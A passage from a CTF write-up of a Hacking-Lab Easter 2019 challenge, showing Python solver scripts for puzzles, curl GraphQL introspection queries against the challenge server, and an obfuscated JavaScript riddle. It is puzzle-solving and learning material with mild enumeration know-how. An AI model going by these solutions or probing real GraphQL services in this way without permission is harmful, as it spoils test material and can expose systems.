result_map):\n      solvedCnt += 1\n      print(&#039;found image in map: &#039;+str(solvedCnt))\n      resp = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?result=&#039;+result_map&#x5B;img]).text\n    else:\n      return False\n    if (solvedCnt == 10 and &#039;Check successful!&#039; in resp):\n      return True\n\nif (solveChallenge12(s, resp)): print(&#039;solved c12!&#039;)\nelse:\n  print(&#039;failure solving c12&#039;)\n  quit()\n\n\n<\/pre><\/div>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Mathonymous<\/h3>\n<br\/>This task requires us to determine the mathematical operations within a equation:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_08.png\" width=\"700\"\/>\n<br\/>\n<br\/>In order to solve this task, I extracted the numbers of the equation and bruteforced the possible operations using <code>eval<\/code> to calculate the result:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\ndef solveChallenge13(s, resp):\n  find1 = &#039;&lt;td&gt;&lt;code style=&quot;font-size: 1em; margin: 10px&quot;&gt;&#039;\n  vals = &#x5B;]\n  vals_tmp = resp\n  for i in range(6):\n    vals_tmp = vals_tmp&#x5B;vals_tmp.index(find1)+len(find1):]\n    vals.append(vals_tmp&#x5B;:vals_tmp.index(&#039;&lt;\/code&gt;&#039;)])\n\n  print(vals)\n  find1 = &#039;&lt;td&gt;&lt;code style=&quot;font-size: 1em&quot;&gt;=&#039;\n  vals_tmp = vals_tmp&#x5B;vals_tmp.index(find1)+len(find1):]\n  vals_res = vals_tmp&#x5B;:vals_tmp.index(&#039;&lt;\/code&gt;&#039;)]\n  print(vals_res)\n\n  ops = &#x5B;&#039;+&#039;,&#039;-&#039;,&#039;*&#039;,&#039;\/&#039;]\n  for op1 in ops:\n    for op2 in ops:\n      for op3 in ops:\n        for op4 in ops:\n          for op5 in ops:\n            eq = &#039;float(&#039;+vals&#x5B;0]+&#039;)&#039;+op1+&#039;float(&#039;+vals&#x5B;1]+&#039;)&#039;+op2+&#039;float(&#039;+vals&#x5B;2]+&#039;)&#039;+op3+&#039;float(&#039;+vals&#x5B;3]+&#039;)&#039;+op4+&#039;float(&#039;+vals&#x5B;4]+&#039;)&#039;+op5+&#039;float(&#039;+vals&#x5B;5]+&#039;)&#039;\n            res = eval(eq)\n            if (float(vals_res)-0.01 &lt; res &lt; float(vals_res)+0.01):\n              op1 = op1.replace(&#039;+&#039;,&#039;%2b&#039;).replace(&#039;-&#039;,&#039;%2d&#039;).replace(&#039;*&#039;,&#039;%2a&#039;).replace(&#039;\/&#039;,&#039;%2f&#039;)\n              op2 = op2.replace(&#039;+&#039;,&#039;%2b&#039;).replace(&#039;-&#039;,&#039;%2d&#039;).replace(&#039;*&#039;,&#039;%2a&#039;).replace(&#039;\/&#039;,&#039;%2f&#039;)\n              op3 = op3.replace(&#039;+&#039;,&#039;%2b&#039;).replace(&#039;-&#039;,&#039;%2d&#039;).replace(&#039;*&#039;,&#039;%2a&#039;).replace(&#039;\/&#039;,&#039;%2f&#039;)\n              op4 = op4.replace(&#039;+&#039;,&#039;%2b&#039;).replace(&#039;-&#039;,&#039;%2d&#039;).replace(&#039;*&#039;,&#039;%2a&#039;).replace(&#039;\/&#039;,&#039;%2f&#039;)\n              op5 = op5.replace(&#039;+&#039;,&#039;%2b&#039;).replace(&#039;-&#039;,&#039;%2d&#039;).replace(&#039;*&#039;,&#039;%2a&#039;).replace(&#039;\/&#039;,&#039;%2f&#039;)\n              resp = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?op=&#039;+op1+op2+op3+op4+op5).text\n              if (&#039;You solved it!&#039; in resp): return True\n              else: return False\n  return False\n\nif (solveChallenge13(s, resp)): print(&#039;solved c13!&#039;)\nelse:\n  print(&#039;failure solving c13!&#039;)\n  quit()\n\n<\/pre><\/div>\n<br\/>\n<br\/>Actually an automated bruteforce script is not necessary, as it suffices to solve this task manually once (and use the session cookie as a saved state).\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Mysterious Circle<\/h3>\n<br\/>When we enter the mysterious circle before having solved the three challenges, we see the following page:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_09.png\" width=\"700\"\/>\n<br\/>\n<br\/>After having solved all three challenges, we don&#8217;t see this message again when stepping on the mysterious circle:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_10.png\" width=\"700\"\/>\n<br\/>\n<br\/>The message from the <code>Navigator<\/code> states: <code>Something strange happened. You seem to be at a complete different place<\/code>.\n<br\/>\n<br\/>As it turned out, the mysterious circle teleported us to another maze. Using the save session cookie, we can reuse the script from above to expose this new maze. Based on the output, I created the following map:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_12.png\" width=\"700\"\/>\n<br\/>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Pumple&#8217;s Puzzle<\/h3>\n<br\/>In the first task of the second map we have to assign different attributes to five bunnies based on 16 statements:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_13.png\" width=\"700\"\/>\n<br\/>\n<br\/>I solved this task by hand on a sheet of paper by simply eliminating possible attributes based on the single statements until every attribute was explicitly assigned to a bunny.\n<br\/>\n<br\/>At first I did not simply reuse the session cookie and thus needed to solve each task a few times. With this task the assignment changes every time the task is reloaded. Though it is only a bijective mapping and can simply be replaced. Thus I wrote the following script to solve the task automatically based on my one-time paper sheet solution:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\ndef solveChallenge14(s, resp):\n  print(resp)\n  x = re.findall(&#039;&lt;pre class=&quot;mb-2&quot;&gt;(.+)&lt;\/pre&gt;&#039;, resp)\n  pres = x&#x5B;1:]\n\n  # manual paper sheet solution\n  b1_name=&#039;Bunny&#039;; b2_name=&#039;Midnight&#039;; b3_name=&#039;Thumper&#039;; b4_name=&#039;Snowball&#039;; b5_name=&#039;Angel&#039;\n  b1_clr=&#039;Red&#039;; b2_clr=&#039;White&#039;; b3_clr=&#039;Yellow&#039;; b4_clr=&#039;Green&#039;; b5_clr=&#039;Blue&#039;\n  b1_char=&#039;Attractive&#039;; b2_char=&#039;Handsome&#039;; b3_char=&#039;Lovely&#039;; b4_char=&#039;Funny&#039;; b5_char=&#039;Scared&#039;\n  b1_sign=&#039;Pisces&#039;; b2_sign=&#039;Virgo&#039;; b3_sign=&#039;Aquarius&#039;; b4_sign=&#039;Capricon&#039;; b5_sign=&#039;Taurus&#039;\n  b1_pattern=&#039;One-coloured&#039;; b2_pattern=&#039;Striped&#039;; b3_pattern=&#039;Chequered&#039;; b4_pattern=&#039;Dotted&#039;; b5_pattern=&#039;Camouflaged&#039;\n\n  x = re.search(&#039;The backpack of (&#x5B;a-zA-Z\\-]+) is (&#x5B;a-zA-Z\\-]+).&#039;, pres&#x5B;0])\n  b1_name = x.group(1).capitalize()\n  b3_clr = x.group(2).capitalize()\n  x = re.search(&#039;(&#x5B;a-zA-Z\\-]+)&#039;s star sign is (&#x5B;a-zA-Z\\-]+).&#039;, pres&#x5B;1])\n  b5_name = x.group(1).capitalize()\n  b5_sign = x.group(2).capitalize()\n  x = re.search(&#039;The (&#x5B;a-zA-Z\\-]+) backpack is also (&#x5B;a-zA-Z\\-]+).&#039;, pres&#x5B;2])\n  b4_pattern=x.group(1).capitalize()\n  b4_clr=x.group(2).capitalize()\n  x = re.search(&#039;The (&#x5B;a-zA-Z\\-]+) backpack by (&#x5B;a-zA-Z\\-]+) was expensive.&#039;, pres&#x5B;3])\n  b2_pattern=x.group(1).capitalize()\n  b2_name=x.group(2).capitalize()\n  x = re.search(&#039;The bunny with the (&#x5B;a-zA-Z\\-]+) backpack sits next to the bunny with the (&#x5B;a-zA-Z\\-]+) backpack, on the left.&#039;, pres&#x5B;4])\n  b4_clr=x.group(1).capitalize()\n  b5_clr=x.group(2).capitalize()\n  x = re.search(&#039;The (&#x5B;a-zA-Z\\-]+) is also (&#x5B;a-zA-Z\\-]+).&#039;, pres&#x5B;5])\n  b3_sign=x.group(1).capitalize()\n  b3_char=x.group(2).capitalize()\n  x = re.search(&#039;The (&#x5B;a-zA-Z\\-]+) bunny has a (&#x5B;a-zA-Z\\-]+) backpack.&#039;, pres&#x5B;6])\n  b1_char=x.group(1).capitalize()\n  b1_clr=x.group(2).capitalize()\n  x = re.search(&#039;The bunny with the (&#x5B;a-zA-Z\\-]+) backpack sits in the middle.&#039;, pres&#x5B;7])\n  b3_pattern=x.group(1).capitalize()\n  x = re.search(&#039;(&#x5B;a-zA-Z\\-]+) is the first bunny.&#039;, pres&#x5B;8])\n  b1_name=x.group(1).capitalize()\n  x = re.search(&#039;The bunny with a (&#x5B;a-zA-Z\\-]+) backpack sits next to the (&#x5B;a-zA-Z\\-]+) bunny.&#039;, pres&#x5B;9])\n  b1_pattern=x.group(1).capitalize()\n  b2_char=x.group(2).capitalize()\n  x = re.search(&#039;The (&#x5B;a-zA-Z\\-]+) bunny sits also next to the (&#x5B;a-zA-Z\\-]+).&#039;, pres&#x5B;10])\n  b2_char=x.group(1).capitalize()\n  b1_sign=x.group(2).capitalize()\n  x = re.search(&#039;The (&#x5B;a-zA-Z\\-]+) bunny sits next to the (&#x5B;a-zA-Z\\-]+).&#039;, pres&#x5B;11])\n  b1_char=x.group(1).capitalize()\n  b2_sign=x.group(2).capitalize()\n  x = re.search(&#039;The backpack of the (&#x5B;a-zA-Z\\-]+) bunny is (&#x5B;a-zA-Z\\-]+).&#039;, pres&#x5B;12])\n  b5_char=x.group(1).capitalize()\n  b5_pattern=x.group(2).capitalize()\n  x = re.search(&#039;(&#x5B;a-zA-Z\\-]+) is a (&#x5B;a-zA-Z\\-]+) bunny.&#039;, pres&#x5B;13])\n  b4_name=x.group(1).capitalize()\n  b4_char=x.group(2).capitalize()\n  x = re.search(&#039;(&#x5B;a-zA-Z\\-]+) sits next to the bunny with a (&#x5B;a-zA-Z\\-]+) backpack.&#039;, pres&#x5B;14])\n  b1_name=x.group(1).capitalize()\n  b2_clr=x.group(2).capitalize()\n\n  # the name b3_name is not mentioned in the statements\n  names = &#x5B;&#039;Thumper&#039;,&#039;Angel&#039;,&#039;Snowball&#039;,&#039;Midnight&#039;,&#039;Bunny&#039;]\n  for name in names:\n    if (name not in b1_name+b2_name+b4_name+b5_name):\n      b3_name = name\n      break\n\n  # the sign b4_sign is not mentioned in the statements\n  signs = &#x5B;&#039;Taurus&#039;,&#039;Aquarius&#039;,&#039;Pisces&#039;,&#039;Virgo&#039;,&#039;Capricon&#039;]\n  for sign in signs:\n    if (sign not in b1_sign+b2_sign+b3_sign+b5_sign):\n      b4_sign = sign\n      break\n  sol = &#039;Name,&#039;+b1_name+&#039;,&#039;+b2_name+&#039;,&#039;+b3_name+&#039;,&#039;+b4_name+&#039;,&#039;+b5_name+&#039;,&#039;\n  sol += &#039;Color,&#039;+b1_clr+&#039;,&#039;+b2_clr+&#039;,&#039;+b3_clr+&#039;,&#039;+b4_clr+&#039;,&#039;+b5_clr+&#039;,&#039;\n  sol += &#039;Characteristic,&#039;+b1_char+&#039;,&#039;+b2_char+&#039;,&#039;+b3_char+&#039;,&#039;+b4_char+&#039;,&#039;+b5_char+&#039;,&#039;\n  sol += &#039;Starsign,&#039;+b1_sign+&#039;,&#039;+b2_sign+&#039;,&#039;+b3_sign+&#039;,&#039;+b4_sign+&#039;,&#039;+b5_sign+&#039;,&#039;\n  sol += &#039;Mask,&#039;+b1_pattern+&#039;,&#039;+b2_pattern+&#039;,&#039;+b3_pattern+&#039;,&#039;+b4_pattern+&#039;,&#039;+b5_pattern\n  resp = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?solution=&#039;+sol).text\n  print(sol)\n  if (&#039;You solved it!&#039; in resp): return True\n  return False\n\n  if (solveChallenge14(s, resp)): print(&#039;solved c14!&#039;)\n  else:\n    print(&#039;failure solving c14!&#039;)\n    quit()\n<\/pre><\/div>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Punkt.Hase<\/h3>\n<br\/>The next task is called <code>Punkt.Hase<\/code> and displays a GIF animation of a blinking dot:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_14.png\" width=\"700\"\/>\n<br\/>\n<br\/>I used the tool <code>convert<\/code> to extract all frames out of the animation. The animation contains exactly 112 frames, which matches <code>112 \/ 8 = 14<\/code> bytes. Accordingly each frame of the animation represents a single bit. If the dot is black, the bit is 1. If the dot is white, the bit is 0. The following script executes <code>convert<\/code> to extract all frames and then checks the color of each frame to create a bit stream, which is submitted as the code:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\ndef solveChallenge15(s, resp):\n  x = re.search(&#039;&lt;img alt=&quot;dontknow&quot; src=&quot;..\/..\/static\/img\/ch15\/challenges\/(.+)&quot; height=&quot;5&quot; width=&quot;5&quot;&gt;&#039;, resp)\n  imgName = x.group(1)\n  # download image\n  imgUrl = &#039;http:\/\/whale.hacking-lab.com:5337\/static\/img\/ch15\/challenges\/&#039;+imgName\n  imgDownload = s.get(imgUrl).content\n  f = open(&#039;c15\/img.gif&#039;, &#039;w&#039;)\n  f.write(imgDownload)\n  f.close()\n\n  subprocess.check_output(&#x5B;&#039;convert&#039;,&#039;-coalesce&#039;,&#039;c15\/img.gif&#039;,&#039;c15\/out%d.png&#039;])\n\n  r = &#039;&#039;\n  for i in range(112):\n    img = Image.open(&#039;c15\/out&#039;+str(i)+&#039;.png&#039;)\n    pix = img.load()\n    if (pix&#x5B;0,0] == 0): r+=&#039;0&#039;\n    else: r+=&#039;1&#039;\n\n  r = hex(int(r,2))&#x5B;2:-1]\n  resp = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?code=&#039;+r.decode(&#039;hex&#039;)).text\n  if (&#039;You solved it!&#039; in resp): return True\n  return False\n\nif (solveChallenge15(s, resp)): print(&#039;solved c15!&#039;)\nelse:\n  print(&#039;failure solving c15!&#039;)\n  quit()\n<\/pre><\/div>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Pssst &#8230;<\/h3>\n<br\/>The next task requires us to fulfil a regular expression:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_15.png\" width=\"700\"\/>\n<br\/>\n<br\/>I did not automate this tasked, but solved a few variants manually and added the solutions to a script, which prompted me to enter the solution manually if an unknown regular expression is encountered:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\ndef solveChallenge16(s, resp):\n  x = re.search(&#039;&lt;pre&gt;He: (.+)&lt;br&gt;You: &lt;input class=&quot;form-control&quot; type=&quot;text&quot;&#039;, resp)\n  regex = x.group(1)\n  print(regex)\n  if (regex == &#039;(&#x5B;13])(&#x5B;37])\\\\2\\\\1&#039;): res = &#039;1312&#039;\n  elif (regex == &#039;(?&lt;!1337)\\d{3}&#039;): res = &#039;123&#039;\n  elif (regex == &#039;(&#x5B;1337])\\\\1&#039;): res = &#039;11&#039;\n  elif (regex == &#039;&#x5B;^13-37]{5}&#039;): res = &#039;44444&#039;\n  elif (regex == &#039;&#x5B;1337]&#039;): res = &#039;1&#039;\n  elif (regex == &#039;\\\\b1337\\\\b&#039;): res = &#039;1337&#039;\n  elif (regex == &#039;(?&lt;!13)37&#039;): res = &#039;37&#039;\n  elif (regex == &#039;(?=\\d+ 1337)\\d+&#039;): res = &#039;3 13377&#039;\n  elif (regex == &#039;&lt;&#x5B;^1337]+&gt;&#039;): res = &#039;&lt;d&gt;&#039;\n  elif (regex == &#039;13(?!37)&#039;): res = &#039;1356&#039;\n  else:\n    res = raw_input(&#039;&gt;&#039;)\n  resp = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?answer=&#039;+res).text\n  if (&#039;You solved it!&#039; in resp): return True\n  return False\n\nwhile (not solveChallenge16(s, resp)): print(&#039;failure solving c16!&#039;)\nprint(&#039;solved c16!&#039;)\n\n<\/pre><\/div>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">The Oracle<\/h3>\n<br\/>The next task contains a quite useful hint what needs to be done:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_16.png\" width=\"700\"\/>\n<br\/>\n<br\/>Thus we have simply to follow the instructions of the hint, set the <code>random.seed<\/code> 1337 times and then calculate the random number:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\ndef solveChallenge17(s, resp):\n  print(resp)\n  x = re.search(&#039;&lt;code&gt;(&#x5B;0-9-]+)&lt;\/code&gt;&#039;, resp)\n  x = int(x.group(1))\n  for i in range(1337):\n    random.seed(x)\n    x = random.randint(-(1337**42), 1337**42)\n\n  resp = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?guess=&#039;+str(x)).text\n  if (&#039;You solved it!&#039; in resp): return True\n  return False\n\nif (solveChallenge17(s, resp)): print(&#039;solved c17!&#039;)\nelse:\n  print(&#039;failure solving c17!&#039;)\n  quit()\n\n<\/pre><\/div>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">CLC32<\/h3>\n<br\/>The following task was amazingly confusing in my opinion:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_17.png\" width=\"700\"\/>\n<br\/>\n<br\/>The name of the task (<code>CLC32 ~= CRC32<\/code>) and the name of the input field (<code>checksum<\/code>) suggests, that we have to find some kind of checksum.\n<br\/>\n<br\/>The first button is linked to the route <code>http:\/\/whale.hacking-lab.com:5337\/live\/a\/life<\/code>. The second one (obviously resetting something) to <code>http:\/\/whale.hacking-lab.com:5337\/?new=life<\/code>.\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_18.png\" width=\"700\"\/>\n<br\/>\n<br\/>After a bit of research, I figured out that this is an interface to a <a href=\"https:\/\/en.wikipedia.org\/wiki\/GraphQL\" target=\"_new\" rel=\"noopener noreferrer\">GraphQL database<\/a>.\n<br\/>\n<br\/>The structure of the database can be enumerated using <a href=\"https:\/\/graphql.org\/learn\/introspection\/\" target=\"_new\" rel=\"noopener noreferrer\">introspection<\/a>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg21# curl -g &#039;http:\/\/whale.hacking-lab.com:5337\/live\/a\/life?query={__schema{types{name}}}&#039;\n{&quot;data&quot;:{&quot;__schema&quot;:{&quot;types&quot;:&#x5B;{&quot;name&quot;:&quot;Query&quot;},{&quot;name&quot;:&quot;In&quot;},{&quot;name&quot;:&quot;Out&quot;},{&quot;name&quot;:&quot;String&quot;},{&quot;name&quot;:&quot;__Schema&quot;},{&quot;name&quot;:&quot;__Type&quot;},{&quot;name&quot;:&quot;__TypeKind&quot;},{&quot;name&quot;:&quot;Boolean&quot;},{&quot;name&quot;:&quot;__Field&quot;},{&quot;name&quot;:&quot;__InputValue&quot;},{&quot;name&quot;:&quot;__EnumValue&quot;},{&quot;name&quot;:&quot;__Directive&quot;},{&quot;name&quot;:&quot;__DirectiveLocation&quot;}]}}}\n\n<\/pre><\/div>\n<br\/>\n<br\/>The only custom types are <code>In<\/code> and <code>Out<\/code>. So let&#8217;s further inspect those types:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg21# curl -g &#039;http:\/\/whale.hacking-lab.com:5337\/live\/a\/life?query={__type(name:%20%22In%22){name%20fields{name%20type{name%20kind}}}}&#039;\n{&quot;data&quot;:{&quot;__type&quot;:{&quot;name&quot;:&quot;In&quot;,&quot;fields&quot;:&#x5B;{&quot;name&quot;:&quot;Out&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;Out&quot;,&quot;kind&quot;:&quot;OBJECT&quot;}},{&quot;name&quot;:&quot;see&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}},{&quot;name&quot;:&quot;hear&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}},{&quot;name&quot;:&quot;taste&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}},{&quot;name&quot;:&quot;smell&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}},{&quot;name&quot;:&quot;touch&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}}]}}}\n<\/pre><\/div>\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg21# curl -g &#039;http:\/\/whale.hacking-lab.com:5337\/live\/a\/life?query={__type(name:%20%22Out%22){name%20fields{name%20type{name%20kind}}}}&#039;\n{&quot;data&quot;:{&quot;__type&quot;:{&quot;name&quot;:&quot;Out&quot;,&quot;fields&quot;:&#x5B;{&quot;name&quot;:&quot;In&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;In&quot;,&quot;kind&quot;:&quot;OBJECT&quot;}},{&quot;name&quot;:&quot;see&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}},{&quot;name&quot;:&quot;hear&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}},{&quot;name&quot;:&quot;taste&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}},{&quot;name&quot;:&quot;smell&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}},{&quot;name&quot;:&quot;touch&quot;,&quot;type&quot;:{&quot;name&quot;:&quot;String&quot;,&quot;kind&quot;:&quot;SCALAR&quot;}}]}}}\n<\/pre><\/div>\n<br\/>\n<br\/>Accordingly both types have the following attributes:\n<br\/><ul style=\"margin-top:8px;margin-bottom:-15px\"><li>see<\/li><li>hear<\/li><li>taste<\/li><li>smell<\/li><li>touch<\/li><li>In\/Out<\/li><\/ul>\n<br\/>\n<br\/>When querying a concrete value, we can see that there seems to be a server-side counter:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg21# curl -g &#039;http:\/\/whale.hacking-lab.com:5337\/live\/a\/life?query={In{see%20hear%20taste%20smell%20touch%20Out{see%20hear%20taste%20smell%20touch}}}&#039;\n{&quot;errors&quot;:&#x5B;{&quot;message&quot;:&quot;&#039;c18&#039; object has no attribute &#039;counter&#039;&quot;,&quot;locations&quot;:&#x5B;{&quot;line&quot;:1,&quot;column&quot;:2}],&quot;path&quot;:&#x5B;&quot;In&quot;]}],&quot;data&quot;:{&quot;In&quot;:null}}\n<\/pre><\/div>\n<br\/>\n<br\/>Thus we need to supply a session cookie:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg21# curl -g &#039;http:\/\/whale.hacking-lab.com:5337\/live\/a\/life?query={In{see%20hear%20taste%20smell%20touch%20Out{see%20hear%20taste%20smell%20touch}}}&#039; --cookie &#039;session=z.TocvCpnRrUIk9CdyjZ+2reqAyMlHSYY4woQ\/Cz6C05pjqKbGobF993p8pny1tmM9jdh8jV9IkF...&#039;\n{&quot;data&quot;:{&quot;In&quot;:{&quot;see&quot;:&quot;p&quot;,&quot;hear&quot;:&quot;X&quot;,&quot;taste&quot;:&quot;M&quot;,&quot;smell&quot;:&quot;H&quot;,&quot;touch&quot;:&quot;3&quot;,&quot;Out&quot;:{&quot;see&quot;:&quot;r&quot;,&quot;hear&quot;:&quot;s&quot;,&quot;taste&quot;:&quot;G&quot;,&quot;smell&quot;:&quot;K&quot;,&quot;touch&quot;:&quot;k&quot;}}}}\n<\/pre><\/div>\n<br\/>\n<br\/>After a few hours of attempting to interpret something into this, I figured out, that it suffices to refresh the above request and writing down all letters, which appear on more than 3 sins (see hint).\n<br\/>\n<br\/>The concatenation of those letters is the checksum supposed to be submitted. Quite a lot of guessing involved here.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Bunny-Teams<\/h3>\n<br\/>The second to last task requires us to solve a little game:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_19.png\" width=\"700\"\/>\n<br\/>\n<br\/>I did not automate this task, but solved it manually. Here is my solution for the given setup:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_20.png\" width=\"700\"\/>\n<br\/>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Opa &#038; CCrypto &#8211; Museum<\/h3>\n<br\/>After having solved all previous tasks, the <code>Opa & CCrypto - Museum<\/code> appears on the map (see picture above for the location):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_11.png\" width=\"700\"\/>\n<br\/>\n<br\/>The source code contains the following javascript:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; gutter: false; title: ; notranslate\" title=\"\">\n&quot;use strict&quot;;\n\nlet theBoxOfCarrots = &#x5B;\n  &#x5B;91968, &quot;16.8.8.10.12.14.15.8.8.9.10.8.9.12.1 ... a lot of values following ...],\n  &#x5B;92109, &quot;14.7.7.7.4.5.5.5.5.8.6.9.11.10.12.1 ... a lot of values following ...], ...];\n\n\/*\nlet a = &#x5B;&#039;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&#039;];\nlet c = 0;\nlet f = false;\nlet n = 0;\nlet s = 1;\nlet alive = true;\nlet age = 0;\nlet destiny = 7331;\nlet note = &#039;Whoever finds this may continue to tell our stories or may reveal the secret that is hidden behind all of them. gz opa &amp; ccrypto&#039;\n\nfunction heOpened(a) {\n    return a;\n}\n\nObject.prototype.and = function and() {\n    if (s % 1 === 0) console.log(&#039;just&#039;);\n    if (s % 3 === 0) console.log(&#039;a&#039;);\n    if (s % 13 === 0) console.log(&#039;lie&#039;);\n    if (s % 37 === 0) console.log(&#039;?&#039;);\n    return this;\n};\n\nObject.prototype.then = function then() {\n    s += 1;\n    return this;\n};\n\nObject.prototype.heClosed = function heClosed() {\n    this.sort((a, b) =&gt; {\n        return a&#x5B;0] - b&#x5B;0]\n    });\n    return this;\n};\n\nObject.prototype.heShuffled = function heShuffled(what) {\n    if (what === &#039;everything&#039;) {\n        this.forEach((o, i) =&gt; {\n            s = o&#x5B;0] + Math.abs(Math.floor(Math.sin(s) * 20));\n            this&#x5B;i]&#x5B;0] = s;\n        });\n\n        this.forEach((o, i) =&gt; {\n            this&#x5B;i]&#x5B;1] += (i + &quot;.&quot;);\n        });\n    }\n\n    return this\n};\n\nObject.prototype.but = function but() {\n    s = s;\n    return this\n};\n\nObject.prototype.sometimes = function sometimes() {\n    if (s % 133713371337 === 0) f = true;\n    return this\n};\n\n\nObject.prototype.heForgot = function heForgot() {\n    if (f) s = Math.abs(Math.floor(Math.sin(s) * parseInt(13.37)));\n    f = false;\n    return this\n};\n\nObject.prototype.heSaid = function heSaid(w) {\n    let magic = 0;\n    w.forEach((y) =&gt; {\n        if (y === &#039;ca&#039;) {\n            magic += 3;\n        }\n        if (y === &#039;da&#039;) {\n            magic -= 1;\n        }\n        if (y === &#039;bra&#039;) {\n            magic \/= 2;\n        }\n    });\n    s -= magic;\n    return this;\n};\n\nObject.prototype.heDidThat = function heDidThat(a) {\n    if (a === &#039;for a very long time.&#039;) {\n        theBoxOfCarrots = this;\n        age += 1;\n        if (age &gt; destiny) {\n            alive = false;\n        }\n    }\n};\n\n\nObject.prototype.heRolled = function heRolled(a) {\n    if (a === &#039;a really large dice&#039;) {\n        n = Math.abs(Math.floor(Math.sin(s) * 1337));\n    }\n    return this\n};\n\n\nlet tell_a_story = () =&gt; {\n    while (alive) {\n        heOpened(theBoxOfCarrots)\n            .and().then().heRolled(&#039;a really large dice&#039;)\n            .and().then().heSaid(&#x5B;&#039;a&#039;, &#039;bra&#039;, &#039;ca&#039;, &#039;da&#039;, &#039;bra&#039;])\n            .but().sometimes().heForgot()\n            .and().then().heShuffled(&#039;everything&#039;)\n            .and().then().heClosed(theBoxOfCarrots)\n            .and().heDidThat(&#039;for a very long time.&#039;);\n    }\n};\n\ntell_a_story();\n*\/\n<\/pre><\/div>\n<br\/>\n<br\/>Analyzing the code revealed that a lot of steps are superfluous. I started by minimizing the code to the necessary steps:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre 